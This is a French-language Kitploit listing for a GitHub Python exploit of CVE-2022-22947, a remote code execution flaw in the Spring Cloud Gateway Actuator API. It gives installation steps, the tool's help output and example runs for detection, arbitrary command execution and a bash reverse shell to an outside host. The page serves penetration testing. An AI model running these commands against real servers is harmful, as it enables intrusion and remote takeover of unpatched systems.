Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
spring-cloud-gateway-rce — Exploit Python pour CVE-2022-22947 (Spring Cloud Gateway RCE) avec exécution de commandes, shell inversé et détection de vulnérabilité via l'injection SpEL de l'API Actuator. | Kitploit
Outils/GitHubGitHub/k3rwin/spring-cloud-gateway-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubk3rwin/spring-cloud-gateway-rce

spring-cloud-gateway-rce

Exploit Python pour CVE-2022-22947 (Spring Cloud Gateway RCE) avec exécution de commandes, shell inversé et détection de vulnérabilité via l'injection SpEL de l'API Actuator.

Voir le dépôt
1231il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exécution de commande par injection d'expression SpEL dans l'API Actuator de Spring Cloud Gateway (CVE-2022-22947)

1.Installation

root@kitploit:~
pip3 install -r requirements.txt

2.Utilisation

root@kitploit:~
$ python3 spring-cloud-gateway-rce.py -h

   ___             __         ____    ___   ____   ____          ____   ____    ___   _  _    _____
  / __\ /\   /\   /__\       |___ \  / _ \ |___ \ |___ \        |___ \ |___ \  / _ \ | || |  |___  |
 / /    \ \ / /  /_\   _____   __) || | | |  __) |  __) | _____   __) |  __) || (_) || || |_    / /
/ /___   \ V /  //__  |_____| / __/ | |_| | / __/  / __/ |_____| / __/  / __/  \__, ||__   _|  / /
\____/    \_/   \__/         |_____| \___/ |_____||_____|       |_____||_____|   /_/    |_|   /_/


                                        CVE-2022-22947 Spring Cloud Gateway RCE
                                                                  By:K3rwin
usage: spring-cloud-gateway-rce.py [-h] [-u URL] [-c CMD] [-s SYSTEM]

Guide d'aide pour Spring Cloud Gateway RCE

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Spécifier l'URL
  -c CMD, --cmd CMD     Spécifier la commande à exécuter (par défaut : whoami)
  -s SYSTEM, --system SYSTEM
                        Spécifier le système d'exploitation cible (par défaut : linux, valeurs : win/linux)

3.Exemple

① -u Détection de vulnérabilité

root@kitploit:~
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/"

image-20220313174120379

② -c Exécution d'une commande spécifique

root@kitploit:~
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/" -c "ip add"

image-20220313174205428

③ Shell reverse

root@kitploit:~
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/" -c "bash -i >& /dev/tcp/vps/6666 0>&1"

image-20220313175050373

Environnement de test Docker

vulfocus

image-20220313175230109

Télécharger l’outil